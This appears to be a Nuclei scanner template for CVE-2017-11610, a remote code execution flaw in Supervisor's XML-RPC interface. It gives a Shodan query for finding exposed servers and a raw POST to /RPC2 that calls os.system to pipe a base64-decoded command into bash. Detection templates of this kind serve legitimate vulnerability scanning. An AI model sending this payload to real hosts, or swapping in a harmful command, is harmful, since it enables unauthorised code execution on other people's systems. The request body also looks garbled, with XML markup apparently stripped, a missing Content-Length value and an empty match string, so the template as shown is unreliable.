id: CVE-2017-11610 info: name: Supervisor XMLRPC Exec (CVE-2017-11610) author: notnotnotveg severity: critical reference: - https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/http/supervisor_xmlrpc_exec.md - https://nvd.nist.gov/vuln/detail/CVE-2017-11610 description: Typically runs on port tcp/9001 tags: cve,cve2017,rce,supervisor metadata: shodan-query: 'http.title:"Supervisor Status"' requests: - payloads: raw: - | POST /RPC2 HTTP/1.1 Host: {{Hostname}} Accept: text/xml Content-type: text/xml Connection: close Upgrade-Insecure-Requests: 1 Content-Length: supervisor.supervisord.options.warnings.linecache.os.system echo -n bHM= |base64 -d|nohup bash > /dev/null 2>&1 & matchers-condition: and matchers: - type: status status: - 200 - type: word words: - "" part: body - type: word words: - "0" part: body